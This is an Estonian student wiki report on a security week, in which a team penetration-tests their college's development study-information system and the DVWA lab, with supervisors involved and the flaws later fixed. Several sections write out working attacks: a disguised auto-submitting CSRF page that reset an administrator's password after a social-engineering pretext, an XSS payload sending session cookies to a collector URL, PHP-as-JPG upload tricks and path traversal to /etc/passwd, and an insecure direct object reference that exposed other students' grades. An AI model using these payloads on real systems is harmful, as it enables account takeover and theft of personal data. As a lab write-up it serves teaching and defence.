Tegime enda kontode peal katsed, et kõik toimiks nii nagu vaja ja ega probleeme ei teki.
Peale seda juhendaja Mart Manguse abiga saime ÕISi adminnile Valter Kunglale väikese test-rünnaku teha.
Mart Mangus üritas seletada, et hinnetelehel on midagi viga ja palus, et Valter vaataks asja üle.
Sellega saavutasime selle, et Valter logis dev-ÕISi sisse oma kontoga.
Valter ütles, et ta ei näe midagi viltu ja selle peale saatsime talle nii nimetatud screenshoti, mille taga oli tegelt meie koodiga screen1.jpg fail.
Kui see fail käivitati, siis Valter Kungla parool muudeti ära ja logiti süsteemist välja.
Tol hetkel, täpselt ennem väljalogimist ja ümbersuunamist, muutus tema parool meie pantud "test123"-ks ja me saime ligipääsu administraatori õigustes kontole.
Rünnak oli edukas.
[[File:Pass fixed.PNG|200px|thumb|right|Dev_OIS fixed]]

Andsime teada Valterile teada, et tegelikult tegime salajase ründe.
Suhteliselt koheselt oli Valteril see CSRF ründe vastu dev-ÕIS ära parandatud, kuna tal oli juba koodiparandus olemas aga lihtsalt rakendamata ja me tabasime ajaliselt viimase hetke ära, kus seda rünnet sai teha.
Peale parandust enam see rünne läbi ei läinud ja süsteem hõiskab vastu, et tegu on ründe või mõne bug'iga.

Kuna tegu oli ÕIS'i arendusversiooniga, siis oli serveris oli lubatud ka error_reporting, mis annab välja ka pildil oleva errorite jada.
Error Reporting on maha keeratud Live keskkonnas ja seal sellist pikka keerulist koodijada veateadetega ette ei tule ning saadetakse teade arendajatele automaatselt.

=== Taavi tegevus ===
====Burp suite====

Esimese asjane peale Burp suite käivitamist. Tabilt proxy ->intercept ->intercept off<br>
Järgnevalt seadistada proxy enda veebiprauserist (mõistlik panna localhost aadress 127.0.0.1 port 8080 ning lülitada sisse ka ssl proxy)<br>
Proxy -> options alt lülitada sisse proxy listner pordile 8080 .<br>
Ohvri valimine <br>
Valida intruder -> target ning sinna sisestada veebileht mida on plaanis uurida https lehe korral lülitada sisse ssl ning pordiks valida 443.<br>
Kui on tarvis lehte ka sisse logituna uurida siis tuleb seadistada järgmised parameetrid.<br>
Valida Options tab sealt sisse lülitada www authentication ning täita all olevad read.<br>site mida rünnatakse tema tüüp(üldiselt basic), login, parool ning valida add.
Kui on soov sooritada veebilehe sipderingi siis tuleb excludida ka logout käsud.<br>
Targer->scope -> exclude frome scope ja veenduda at välja on arvatud logout laused.<br>
Spideringi sisselülitamine <br>
Valida tab Spide ning sealt panna linnuke kasti spider running.<br>
Ning oledki valmis saama laheküljelt infot.<br>
Tööriistal on veel tohutu hulk seadistus võimalusi, aga kahjuks ajanappuse tõttu ei jõudnud nende kõikidega tutvuda.<br>
Tööriis ei ole mõeldud algajatele, kuid teda tundma õppides on võimailik sooritada keerukaid operatsioone. Suurim nõrkus sellel programmil on see, et ta otsing ei näita ära nõrkasid kohti veebilehel vaid need tuleb ise koodist ülesse otsida.

====Nessuse algkäivitamine====
Valida backtrackist vulnerability scannerite alt nessus ning edasi nessus register .<br> Täite ära vajalikud read veebilehel ning mailile saadetakse aktiveerimis kood.<br> Järgnevalt avada termnal ning sisestada käsk : /opt/nessus/bin/nessus –fetch –register **********(tärnide asemele meilile saadetud kood)<br>
Nüüd läheb aega kuni nessus updatedakse (ole valmis ootama võtab tükk aega.)<br>
Järgnevalt käivitada nessus user add ning sinna sisestada soovitav kasutajanimi nessusele, kui küsitakse kas admin konto siis sisestada y. Kõik on korras kui tuleb ette kiri user added.<br>
Järgnevalt valida nessus start.<br>
Et nessusesse siseneda veebibrauseri URL i kirjutada 127.0.0.1:8834
Siis avaneb leht kus tuleb vajutada lehe alaosas olevale lingile mis suunab https leheküljele.<br>
Antud tööriist ei ole just kõige sobilikum veebilehtede testimiseks.

=== Matise tegevus ===

====Väike upload tegevus, mis võiks olla teisiti====
Ajal mil on avatud stipendiumi taotlemine on võimalik uploadida üles dokumente, et anda lisainformatsiooni abitoetuse taotlemiseks.
Testimisel selgus, et hetkel üles on võimalik üles laadida ükskõik mis laiendiga faile.
Proovisime üles laadida:
<li>filmi
<li>exe
<li>jpm faile
<br>kõik läks läbi ja sai uploadida.
<br>Sellises kohas võiks olla süsteem tehtud <b>whitelisti</b> põhimõttel,
<br>et lubatud oleks ainult:
<li>.doc
<li>.docx
<li>.pdf

=== Sanderi tegevus ===
[[File:W3af skanner.png|150px|thumb|w3af skänni seaded]]
Backtarcki keskkonnas sai testitud programmi w3af.

==== Backtrack: w3af ====
[[File:Basic HTTP Auth.png|150px|thumb|w3af Basic HTTP Auth]]
[[File:ÕISi küpsis.png|150px|thumb|Mozilla Firefox küpsis]]
[[File:W3af_Cookie.png|150px|thumb|w3af Cookie]]
Võimalik kätte saada SSL Certificate.
Aadressiribalt leitud sisselogimis-aadressiga sisse logimine ei õnnestunud:
https://itcollege.dev.ois.ee/auth/login?continue=/auth/login?
username=<font color="red">KASUTAJANIMI</font>&continue=&Login=Logi sisse&pw=<font color="red">PAROOL</font>
Programmi sisestatud andmetega ka mitte:
Configuration -> HTTP Config -> Basic HTTP Authentication:
basicAuthUser: <font color="red">KASUTAJANIMI</font>
basicAuthPass: <font color="red">PAROOL</font>
basicAuthDomain: http://itcollege.dev.ois.ee
Mozilla Firefoxi küpsis õnnestus luua Töölauale hetkel sisse logitud sessiooni ID-ga. Programmi küpsise sisestamine:
Configuration -> HTTP Config -> Cookies
cookieJarFile: /root/Desktop/<font color="red">ois_cookie.txt</font>
Seda loodud sessiooni ID-ga küpsist kasutada algul ei õnnestunud. Ilmselt oli midagi valesti. Õige on:
# Netscape HTTP Cookie File
.dev.ois.ee TRUE / FALSE 1731510001 itcollege_OIS_SESSION_ID <font color="red">870aqllryuw3cmf6cv8ellha03</font>
Esimene rida on nõutav! Teiste tähendused:
domain - The domain that created and that can read the variable.
flag - A TRUE/FALSE value indicating if all machines within a given domain can access the variable.
This value is set automatically by the browser, depending on the value you set for domain.
path - The path within the domain that the variable is valid for.
secure - A TRUE/FALSE value indicating if a secure connection with the domain is needed to access the variable.
expiration - The UNIX time that the variable will expire on.
name - The name of the variable.
value - The value of the variable.
Küpsis on leitav Mozilla Firefoxis peale itcollege.dev.ois.ee-s oma kasutajaga sisse logimist:
Edit -> Preferences -> Privacy -> History -> remove individual cookies
Search: itcollege.dev.ois.ee
Leitud valiku all Cookie Name: itcollege_OIS_SESSION_ID

Skänneerimine:
<ul>
<li>The page language is: en</li>
<li>The URL: "https://itcollege.dev.ois.ee/" has a "<form>" element with auto-complete enabled.</li>
<li>A comment with the string "<p>tunne end kui koolis</p>" was found in: "https://itcollege.dev.ois.ee/".</li>
<li>Found a form login. The action of the form is: "https://itcollege.dev.ois.ee/auth/login".</li>
The username field to be used is: "username".
The password field to be used is: "pw".
<li><font color="red">Found authentication credentials to: "https://itcollege.dev.ois.ee/auth/login". A correct user and password combination is: Administrador/6666666</font></li>
Antud kasutaja ja parooliga sisse ei saanud.
<li>The URL: "https://itcollege.dev.ois.ee/" returned a response that may contain a "SHA1" hash. The hash is: "c7b39896de5f296b5a44c2dfcd9f0600b2cf424d". This is uncommon and requires human verification.</li>
Taolisi ja MD5 hashiga ridu leiti 355. Kõik vajavad inimese kontrolli.
<li>The URL: "https://itcollege.dev.ois.ee/" sent these cookies:</li>
itcollege_OIS_SESSION_ID=lm8llh4i3k2yj4d7rho6791u05; path=/
itcollege_OIS_SESSION_ID=lm8llh4i3k2yj4d7rho6791u05; Path=/
<li>The SMTP settings in emailReport plugin seem to be incorrect. Original error: "[Errno 111] Connection refused".</li>
Kui tuleb see veateade, siis skänn katkeb.
<li><font color="red">The following scripts allow an attacker to send POST data as query string data (this makes XSRF easier to exploit):</font></li>
The URL: https://itcollege.dev.ois.ee/auth/openid-login is vulnerable to cross site request forgery.
It allows the attacker to exchange the method from POST to GET when sending data to the server.
The URL: https://itcollege.dev.ois.ee/auth/id-login is vulnerable to cross site request forgery.
It allows the attacker to exchange the method from POST to GET when sending data to the server.
<li><font color="red">SQL injection in a Unknown database was found at: "https://itcollege.dev.ois.ee/auth/login", using HTTP method POST.</font></li>
The sent post-data was: "username=John8212&security_key_sis_global=d'z"0&Login=Logi%20sisse&continue=56&pw=FrAmE30.".
The modified parameter was "security_key_sis_global". This vulnerability was found in the request with id 390.
<li>Leidis ka otsirobotitele mõeldud faili: https://itcollege.dev.ois.ee/robots.txt</li>
User-agent: *
Disallow: /
Allow: /curriculum
Allow: /subject
Allow: /diploma
Allow: /schedule/ical
</ul>

== 4. päev - Presentatsiooni tegemine ja esitlemine ==

Koostasime presentatsiooni ja esitlemine.

[[Media:Security_team_presentation.ppt]]

== Arvamused intensiivõppe nädala kohta ==

Sander: Õppisime erinevaid testprogramme ja testkeskkondi kasutama, mida varem kunagi kasutanud polnud. Suutsime avastada nii mõnegi vea, mida varem avastatud ei olnud. Usun, et ÕIS on nüüd kasvõi veidigi turvalisem. Soovitan ka teistele tudengitele intensiivõppenädalal osalemist, kuna valides õige teema võib olla päris huvitav tegeleda millegagi, mida varem teinud pole või mida tegelikult lihtsalt ei ole lubatud teha.

Urmo: Intensiivõppe nädalaga sai õpitud nii mõndagi huvitavat veebiturve ja selle testimise kohta. Kuna aega oli vähe, siis sai hulgaliselt kogemust ja oskust reaalselt planeerida mahukat tööd täiesti nullist kuni reaalse rakendatava tulemuseni ning pani proovile stressitaluvuse tõestamaks pinge all jätkusuutlikku töötamist. Intensiivõppe nädalal võiksid osaleda kõik, kellel väheke tahtmist midagi uurida ja korda saata ning saada reaalset töökogemust ennem töömaailma sukeldumist.

== Tegijad ==
:Alo Konno A21
:Urmo Lihten A21
:Taavi Podžuks A22
:Matis Alliksoo A22
:Sander Saarm A22

== Juhendajad ==
Täname oma juhendajaid:
:Mart Mangus
:Margus Ernits
:Valter Kungla

Security team

2012-03-30T21:04:46Z

Ulihten: /* Acunetix Web Vulnerability Scanner v. 8 automaatskännimise tööriistaga tutvumine */

== 1. päev - Materjalidega tutvumine ==

https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project

A1: Injection - Urmo
A2: Cross-Site Scripting (XSS) - Alo
A3: Broken Authentication and Session Management - Sander
A4: Insecure Direct Object References - Alo
A5: Cross-Site Request Forgery (CSRF) - Taavi
A6: Security Misconfiguration - Matis
A7: Insecure Cryptographic Storage - Matis
A8: Failure to Restrict URL Access - Urmo
A9: Insufficient Transport Layer Protection - Taavi
A10: Unvalidated Redirects and Forwards - Sander

Sanderi konspekt: [[Media:Ois_materjal.pdf]] <br>
Urmo esitlus: [[Media:Injection-Failure_URL_access.ppt]] <br>
Taavi esitlus [[Media:A9.pdf]] <br>
Taavi esitlus [[Media:A5.pdf]] <br>
Matise esitlus [[Media:Insecure Cryptographic Storage.pdf]] <br>
Matise esitlus [[Media:Security Misconfiguration.pdf]] <br>
Alo Esitlus: [[Media:Cross-site_scripting_(XSS).ppt]] <br>

== 2. päev - Nõrkuste ja rünnete tundmaõppimine ja katsetamine==
===Security Team tegevusplaan===
1. Päev
1.1 Tutvuda OWASP’iga.
1.2 Tutvuda OWASP’i aasta 2010 TOP 10 veebirakenduse turvariskidega.
1.3 Iga grupiliige teeb 2 turvariski kohta väikese tutvustava ettekande.
2. Päev
2.1 Esitada tiimi tegevusplaan.
2.2 Tutvuda turvariskidega natuke põhjalikumalt.
2.3 Tutvuda ja katsetada erinevaid pen-testingu tööriistasid – BackTrack ja SamuraiCD võimalused.
2.4 Täiendada esimese päeva ettekannet.
3. Päev
3.1 Alustada dev-ÕISi peal turvariskide leidmist – samuti iga grupi liige testib/katsetab 2 turvariski ekspluateerimist.
3.2 Saadud tulemuste dokumenteerimine.
4. Päev
4.1 Saadud tulemuste esitlemine ettekandega
5. Päev
5.1 Tulemuste parandamine wiki’s.

=== Alo tegevus ===
==== Acunetix Web Vulnerability Scanner v. 8 automaatskännimise tööriistaga tutvumine ====
http://www.acunetix.com/support/vulnerability-checks.htm
http://projects.webappsec.org/w/page/13246920/Cross%20Site%20Scripting
http://wiki.developerforce.com/page/Secure_Coding_Cross_Site_Scripting
http://www.youtube.com/watch?v=SG1cvGQ971g
http://www.isecom.org/research.html
http://evuln.com/tools/
http://sectools.org/tag/web-scanners/
http://www.webresourcesdepot.com/10-free-web-application-security-testing-tools/
http://www.acunetix.com/vulnerability-scanner/getting-started.htm

Internetist sai otsitud parimat Windowsi automaatskännerit ja selleks osutus:
Acunetix Web Vulnerability Scanner v. 8
http://www.acunetix.com/vulnerability-scanner/

Pärast programmi installimist tuli seadistada skännimine, valisime keskmise põhjalikkusega skänni.

Erinevalt teistest automaatskännidest sai sellel lihtsamalt seadistatud sisselogimine ja lisaks sai paika panna ka, et ta arvestaks välja Log out lingi.

Antud programm võimaldab skännida:
:Cross-Site Scripting (XSS)
:SQL Injection (blind test)
:File inclusion
:Code Execution
:LDAP Injection
:Cross Frame Scripting
:SQL Injection (error msg. test)
:CRLF Injection
:Directory Travelsal
:XPath Injection
:URL Redirection
:Application Error Message

Kuna skänner skännib väga põhjalikult ja teskeskonnal ei töötanud täsvõimsusel oli ping väga suur ja skänn tegi vähe päringuid tunnis siis oleks täisskänni ajaliselt paar päeva.

=== Urmo tegevus ===

Kasutan BackTrack 5 R2 64bit Gnome ja Samurai CD 0.9.9 operatsioonisüsteeme katsetamaks ja uurimaks erinevate veebilehtede turvariskide ära kasutamist.

Pandud tööle Samurai ja kasutatud Damm Vurnelable Web Application'i.

==== Brute Force (DVWA) ====
Käsitsi välja uuritud login andmed:
kasutajanimi: admin
parool: password

===== Fireforce plugin Firefoxis =====
Tekitatud sai ka password list faili pass.txt.

Kasutusel oli Firefox brauser, kuhu installisime plugin'a Fireforce.
Siin kasutasime Youtube õpetust: http://youtu.be/lmgMXhM01fY .

Panime kasutajanimeks "admin" ja paroolilahtris parema klõpsuga valisin Fireforce menüüst Library, ning laadisin talle pass.txt faili sisse.
Küsiti veel, et mis teksti veebilehelt peab otsima, kui sisselogimine on ebaõnnestunud.
Selleks sai sõna "incorrect".
Määrata ära tuli ka, et mitu päringut sekundis tehakse.
Panime 10 aga kuna veebileht ei jõua sekundis nii palju ennast kuvada.
Päringute tegemise kiirus vähem kui 1 päring/sekundis.

Töötavat tulemust me ei saanud, kuna õigest paroolist mindi üle pidevalt.
Kasutasime ka videos näidatud "@ DICTIONARY" teksti ühes lahtris ja siis plugin ei tahtnud üldse proovida ja lasi kõik katsed üle mingil põhjusel.

Kuna me seda lahendust ei saanud tööle, siis sai proovitud ka BurpSuite programmi.

===== Burpsuite v1.4 =====
Burpsuite v1.4 on Samurai WTF'il olemas juba sees ja saab kohe käima panna.
[[File:Bp2naide.jpg|200px|thumb|right|BurpSuite näidis screenshot UI'st]]

Programm on juba loomult keerulisem.
Burpsuite'iga tuleb panna käima proxy server localhost'is ja brauser määrata kasutama seda proxy serverit aadressil 127.0.0.1:8080.
Kui ligipääs on rünnatavale lehele on olemas, siis teha prooviks üks väär sisselogimine.
Läbi proxy serveri tuleb BurpSuite'ile kohale vastava veebilehe Header sisselogimise kohta.
Headeris tuleb payloadi positsioonid ära määrata, kuhu see hakkab nimekirja alusel igat sõna panema.
Payload'i positsioonideks Headeris on username ja password lahtrid ning nendesse jätta ainult 2 paragrahvi tähemärki.
Ründe stiiliks määrata Pitchfork.
Mõlema payloadi positioni kohta tuleb ära määrata sõnade listid, mida programm hakkab kasutama.
Optioniste alt tuleb üle kontrollida ka sõnad, mida jälgitakse ebaõnnestunud sisselogimiste korral ja lubaksid järgmisi katseid.
Kui listid sai ära määratud, siis sai panna menüüst käsu Intruder -> Start Attack, mis siis alustas rünnet.
Kahjuks ka see rünne ei toiminud teadmata põhjusel.
Proovitud sai ka lühemate nimekirjadega ja edutult.

Peale teise programmi kasutamist jõudsime järeldusele, et Brute Force ründest pole meil kasu ja ei aita eesmärki täita effektiivselt.
Dev-ÕISis on vastavad turvameetmed kasutusele võetud, mis takistab selle tegemist ehk avastamisel keelatakse 5-ks sisselogimine ära vastava teatega ja brute force programmidele ei tule vastavat sõna, mis tähendaks sisselogimise ebaõnnestumist ning annab valepositiivse.

Lõpptulemus: Arendusversioon ÕISist on ära turvatud BruteForce rünnete vastu sisselogimisel.

==== CSRF - Cross-site request forgery ====
Katsetamine toimub koos Taaviga.

Loome uue veebilehe, mis saadab aktiivse kasutaja alt käske edasi mõnele veebisaidile, mis usaldab autoriseeritud kasutajat.

Katse eesmärgiks on DVWA-s kasutaja parooli muutmine, niiet ta ise paneb meie veebilehel on oma praeguse parooli sisse ja Submit nupu vajutamisel saadetakse see koos peidetud väljadega (mis on varustatud uute paroolidega) DVWA parooli muutmise lehele ja tulemuseks on kasutaja muudetud parool.

Lõime uue faili - crosssite.txt

DVWA-s läksime lingile CSRF, kus saab sooritada parooli muutmist.
Võtsime lehe Source Code lahti
Otsisime üles paroolide formi koodi üles ja kopeerisime selle enda veebilehele.
Muutsime ära action väärtuse, DVWA veebilehe omaks, kus muudetakse paroole.
Current Password lahtri jätsime samaks.
Ülejäänud kahe uue passwordi fieldi type'iks määrasime "Hidden" ja value'deks "admin".
Salvestasime faili ja käivitasime selle.
Tuli ette ainult lahter Current Passwordi ja Submit nupuga.
Panime sisse tolle hetke parooli ning saatsime teele päringu ning saimegi DVWAlt vastuseks, et parool muudetud ehk parooliks sai hidden väljades määratud sõna ".

Lõpptulemus: Kasutaja salajane ja ootamatu paroolivahetus sai ära täidetud.

=== Taavi tegevus ===

Backtrack 5 R2 - parimate tööriistade ja meetodite uurimine et leida turvanõrkusi.

=== Matise tegevus ===
==== Reflected Cross Site Scripting (XSS) ====
<ul>
<li>Lehel on selline Form:</li>
[[Image:Xsstesting.jpg|Location="left"|Caption|]]
<br>Form väljastab : Hello „sisestatud nimi“
<li>Easy puhul:</li>
<li>Saab sisestada textboxi skripti:</li>
<script>
alert(document.cookie.match(/PHPSESSID=[^;\]+/));
</script>
<li>Eelnev skript toob ekraanile lihtsalt hetke sessioni ID.</li>
<li>Kui sellist asja on võimalik sisestada siis saab juba sellise skripti teha mis saadab kasutaja mingile sinu enda leheküljele kuhu on taha lisatud Session ID: </li>
<script>
this.document.location.href = „http://127.0.0.1/varastatud_sess_id/ + document.cookie.match(/PHPSESSID=[^;\]+/);
</script>
<li>Saab kohe enda veebiserveri logidest näha Session ID’d.
<br>Näide logist:</li>
/var/log/apache2/access.log
127.0.0.1 - - [27/Mar/2012:09:06:31 -0400] "GET /varastatud_sess_id/PHPSESSID=51dc79948ee4cd23e6f8160ef2b57945 HTTP/1.1" 404 404 "-" <br> "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.11) Gecko/20101013 Ubuntu/9.04 (jaunty) Firefox/3.6.11"
<li>Tuleb ründajal lisada endale uus cookie saabunud Session ID’ga ja peakski olema võimalik teise inimese sessioon üle võtta.</li>
</ul>

=== Sanderi tegevus ===
[[File:DVWA_upload.png|150px|thumb|DVWA Upload]]

SamuraiWTF kasutamine testimiseks: DVWA (Damn Vulnerable Web Application).
==== Faili üleslaadimine: madal tase ====
<ul>
<li><b>DVWA Security</b> määrata: Low -> Submit</li>
<li>Valida: Upload</li>
<li>Üles laadida saab suvalisi faile: *.php, *.html, *.jpg, .htaccess</li>
Üleslaetavasse *.php faili saab kirjutada php koodi:
<?php var_dump($_REQUEST, $_SERVER); ?>
<li>Minnes üleslaetava *.php faili asukohta veebilehitsejas http://dvwa/hackable/uploads/*.php käivitatakse skript ja tagastatakse kõik küsitav:</li>
esimeses massiivis "PHPSESSID" ("2b1ae19446cfde009664f18df51b6ec1") ja turvatase "security" ("low");
teises "HTTP_COOKIE", milles on eelnevadki andmed; asukoht "PATH", "SERVER_SOFTWARE", "SERVER_NAME",
"SERVER_ADDR" ("127.42.84.1"), "SERVER_PORT" ("80"), "REMOTE_ADDR" ("127.42.84.1"), "REMOTE_PORT" ("53425") jpm.
</ul>

==== Faili üleslaadimine: keskmine tase ====
<ul>
<li><b>DVWA Security</b> määrata: Medium -> Submit</li>
<li>Valida: Upload</li>
<li>Üles laadida ei saa näiteks järgnevates formaatides faile:</li>
.htaccess
.php .html .pdf
.gif .png .bmp
.svg .swf
.tif .tiff .exif
.raw .cgm
<li>Üles laadida saab kõiki .jpg-lõpulisi faile (ka *.php.jpg, mitte *.jpg.php)</li>
<li>Üleslaetavasse *.jpg faili saab kirjutada php koodi.</li>
<li>Minnes üleslaetava *.jpg faili asukohta veebilehitsejas, ei käivitata skripti, vaid tagastatakse faili asukoha aadress:</li>
http://dvwa/hackable/uploads/*.jpg
<li>Skripti käivitamiseks tuleb kasutada "?page=" ja faili asukoht:</li>
http://dvwa/vulnerabilities/fi/?page=../../hackable/uploads/*.jpg
Kuvatakse php skripti tulemus.
Kommentaar: "?page=" kasutamine võetud menüüvalikust: <b>File Inclusion</b>
<li>"?page=" abil saab vaadata kasutajate nimesid:</li>
http://dvwa/vulnerabilities/fi/?page=../../../../../etc/passwd
<li>Paroole vaadata ei saa, selleks õigused puuduvad:</li>
http://dvwa/vulnerabilities/fi/?page=../../../../../etc/shadow
</ul>

==== Faili üleslaadimine: kõrge tase ====
<ul>
<li><b>DVWA Security</b> määrata: High -> Submit</li>
<li>Valida: Upload</li>
<li>Üles laadida saab kõiki .jpg-lõpulisi faile (ka *.php.jpg, mitte *.jpg.php)</li>
Üleslaetavasse *.jpg faili saab kirjutada php koodi.</li>
<li>Minnes üleslaetava *.jpg faili asukohta veebilehitsejas, ei käivitata skripti, vaid tagastatakse faili asukoha aadress.</li>
<li>Skripti käivitamiseks ei piisa ka "?page=" kasutamisest. Igal juhul on vastus selline:</li>
ERROR: File not found!
<li>Kasutada tuleks kuueteistkümnendkoodi, mille saab moodustada näiteks sellel aadressil:</li>
http://www.motobit.com/util/base64-decoder-encoder.asp
<li>Moodustades loodud faili asukohast kood ja kasutades</li>
data:php/html;base64,aHR0cDovL2R2d2EvaGFja2FibGUvdXBsb2Fkcy91cGxvYWQyLmpwZw==
üritatakse seda arvutisse salvestada. Salvestamisel .part-nimelise faili, on selle sisuks samuti lihtsalt faili asukoht veebis:
http://dvwa/hackable/uploads/*.jpg
</ul>

== 3. päev - Dev-ÕIS'i turvatestimine==

=== Alo tegevus ===
[[File:PDFHinneteleht.png|200px|thumb|right|Näide hinnetelehest]]
Kui testisime failide uploadimis võimalusi tuli idee testida ka failide allalaadimist.<br>
Faile saab alla laadida enda profiili all õppesooritustes.<br>
Seal on võimalik alla laadida nii .pdf kui ka .odt formaadis õppesooritusi.<br>
Allalaadimis Urli muutmisega oli võimalik alla laadida teiste kasutajate õpitulemusi.<br>
Õpitulemused sisaldasid lisaks tulemustele ka inimese isikukoodi.<br>
Kui oleks soovinud õpitulemusi alla laadida kindla kasutaja õpitulemusi oleks saanud õpilase id kätte tema profiili pildi id kaudu.<br>
Kuna see oli tõsine turvaauk ja õpilaste andmed on konfidentsiaalsed täiendati url accessi nii, et enam üks õpilane teise inimese andmetele ligi ei pääseks.<br>

=== Urmo tegevus ===
====Subgraph Vega ====
Subgraph Vega on beeta staadiumis olev vabavaraline veebiapplikatsioni nõrkuste skänner, proxy ja platvorm.
Selle tööriistaga annab välja otsida SQL injectionit võimaldavad kohad, Cross-Site-Scriptingut, URL injection jne võimaldavaid nõrkusi veebilehel.
Programm on Java põhine graafilise liidesega ja töötab Linux'i, OS X ja Windowsi peal.

[[File:Screenshot_vega1.png|200px|thumb|right|Subgraph Vega screenshot]]
Päeva alguses sai hakatud katsetama seda ÕISi arenduskeskkonna peal.

Alustasime uut skänni (Start New Scan).
Küsitakse URI, milleks andsime https://itcollege.dev.ois.ee ja Next.

Järgnevalt on vaja anda kätte sisselogitud kasutaja cookie ja vajadusel lisada kindlate linkide välistamise regullaar avaldised.

Me lisasime ainult küpsise (cookie) sisu:
<pre>
itcollege_OIS_SESSION_ID=sellecookiesisu1234563221
</pre>
ning Finish.

[[File:Screenshot_vega2.png|200px|thumb|right|Subgraph Vega screenshot ühe leitud nõrkusega]]
Järgnevalt ta hakkab skännima ette antud veebilehte ja kui küpsise info ning aadress on õige, siis ta suudab sisselogimisest mööda saada ilusti ja saab uurima hakata, kus võimalikud vead võivad olla. Tegutsemine võttis suhteliselt kaua aega (u. 30minutit).

Katkestasime skännimise ära, kui ta oli umbes 15000 objektist ära skänninud umbes 12000.

Selleks ajaks oli Vega leidnud kõrgema tasemega Cross Site Script'ingu nõrkusi 58, keskmise tasemega Absolute Path nõrkusi 2, ja lihtsalt informatsiooniks 6 tühja element Body nõrkust.

Uurides leitud Cross Site Scriptingu leitud nõrkusi, saime aru, et tegu on selliste aadressitega, milles veebilehed kasutavad aadressirealt saadud ID'sid ja parameetreid ära oma pealkirjades.
Õnneks parameetritega väljad olid veebilehel korralikult ära escape'itud ja saniteeritud, et suhteliselt võimatu oli saada mõnda scripti sinna sisse panna, et veebileht midagi teistmoodi teeks.

ID väljade osas aga ei olnud kaitstud üks link, mille avastas Alo ennem mind.

==== Wapiti ====
Proovisime ära ka Backtrack 5 R2 tööriista Wapiti.
(Koduleht: http://wapiti.sourceforge.net/)

Kahjuks ei saanud seda tööriista kasutada dev-ÕISi pihta, kuna see tööriist ei osanud HTTPS'iga midagi teha.

==== CSRF käsitsi rünne HTML/PHP/JAVASCRIPTiga====
=====1. katse - ÕISi keskkkonna keelevahetus =====
[[File:Keeleseaded.png|thumb|200px|right|ÕISi keeleseadete menüü]]

Päeva esimeses pooles sai avastatud, et dev-ÕISi kasutaja keskkonna keelt saab muuta, kui mõnelt väliselt veebilehelt saata vastav POST päring lingile, mis muudab keelte seadistust.

Võtsime dev-ÕIS'i Source Code'ist välja vastava formi osa ja panime eraldi html faili.
Koristasime mittevajaliku disaini koodi juurest ära.
Muutsime form'i action väärtust pannes olemasoleva ette https://itcollege.dev.ois.ee/ osa ehk oleks absoluutne aadress relatiivse asemel.
Teises fieldis, kus oli vaja määrata keele tähistus, mida saadetaks, panime väärtuseks "en" ehk inglise keelne keskkond tekiks.
Panime koodi enose veebiserverisse üles nimega ois.html.

Faili sisu:
<source lang="html4strict">
<form id="settingsForm" method="post" action="https://itcollege.dev.ois.ee/setting/edit?user_id=2198"
enctype="application/x-www-form-urlencoded">
<input type="hidden" AUTOCOMPLETE="off" name="default_language"value="en">
<br>
<input type="submit" value="Salvesta seaded" name="Savesettings">
</form>
</source>
Panime faili enda arvutis käima, tekkis vastav form ette, kus submit pannes päring jõudis õisi ja muudeti kogeselt ära keskkonna kasutaja keel.

Katsetas koodi enda konto peal Taavi.

=====2. katse - ÕIS'i kasutaja parooli muutmine =====

[[File:Salasona_ois.PNG|200px|thumb|right|Dev_OIS salasõna muutmisvorm]]
Otsustasime proovida, kas CSRF nõrkust annaks ära kasutada ka ÕISi administraatori pettes, kui saata talle pildi link, kus tegelikult taga jookseb HTML/JAVASCRIPT koos, mis saadab POST päringu salasõna muutmisega. Selle toimiseks oli eelduseks see, et rünnatav on ründamise hetkel juba dev-ÕISi sisselogitud.

Selle jaoks uurisime välja, kus asub dev-ÕIS'i kasutaja salasõna muutmise vorm ja kuhu saadetakse vormi sisu.
Vormilt võtsime lähtekoodist (Source Code) vastava koodi välja ja panime eraldi php faili.

Muutsime password ja password_check lahtrite väärtused järgnevaks: "test123" ehk kasutaja uus parool peale rünnakut.

Lahtrites muutsime user_id'd sisaldavad väärtused rünnatava kasutaja user_id vastu, mille saab kätte tudengite/vilistlaste/õppejõudude piltide aadressidelt kätte.

Kõik vormi lahtrite tüübid määrasime peidetud ehk "hidden", et poleks midagi näidata.

Kuna parooli muutmise formil on küljes ka continue parameeter, mis näitab seda, kuhu kasutaja viiakse peale parooli muutmist.
Selle muutsime väljalogimise lingiks, et peale POST päringu tegemist suunatakse kasutaja väljalogimise lehele.
Sellisel juhul ei tule ette teadet, et parooli just muudeti kuskil ja kasutaja enam ei saa oma vana parooliga sisse logida.

Lisasime CSS koodi Submit nupu ära peitmiseks.
JavaScript koodi, et kui leht on laetud, siis automaatselt vajutataks seda nähtamatut Submit nuppu, et brauser saadaks HTML POST päringu ÕISi poole teele.

Salvestasime faili ära kui "screen1.jpg" fail. Ohver arvab, et tegu on pildiga, kui saadame lingi ja seda veel usaldusväärse aadressi pealt.
Tegelikult kasutaja ei näe praegu ühtegi pilti ja suunatakse edasi.

Faili sisu:
<source lang="html4strict">
<html>
<head>
<style type="text/css">
#Setpassword{ width: 0px; height: 0px; border: none; padding: 0; margin: 0; }
</style>
</head>
<body>
<body onload="document.forms.setPasswordForm.submit();">
<form name="setPasswordForm" id="setPasswordForm"
action="https://itcollegedev.ois.ee/et/user/set-own-password?user_id=2227&continue=/auth/logout"
method="post">
<input type="hidden" name="user_id" value="2227" id="user_id" />
<input type="hidden" name="continue" value="%2Fet%2Fsetting%3Fuser_id%3D2227" id="continue" />
<input type="hidden" name="password" id="password" value="test123" />
<input type="hidden" name="password_check" id="password_check" value="test123" />
<input type="submit" name="Setpassword" id="Setpassword" value="Muuda salasõna" />
</form>
</body>
</html>
</source>

[[File:Admin_proof.PNG|200px|thumb|right|Ligisaadud adminpaneelile]]

Tegime uue faili htaccess.txt, kuhu panime kirja käsu, mis käivitaks php ja jpg faile kui php failidena.
<pre>
AddType application/x-httpd-php .php .jpg
</pre>

Laadisime mõlemad failid Enose veebiserverisse avalikult.

Tegime enda kontode peal katsed, et kõik toimiks nii nagu vaja ja ega probleeme ei teki.
Peale seda juhendaja Mart Manguse abiga saime ÕISi adminnile Valter Kunglale väikese test-rünnaku teha.
Mart Mangus üritas seletada, et hinnetelehel on midagi viga ja palus, et Valter vaataks asja üle.
Sellega saavutasime selle, et Valter logis dev-ÕISi sisse oma kontoga.
Valter ütles, et ta ei näe midagi viltu ja selle peale saatsime talle nii nimetatud screenshoti, mille taga oli tegelt meie koodiga screen1.jpg fail.
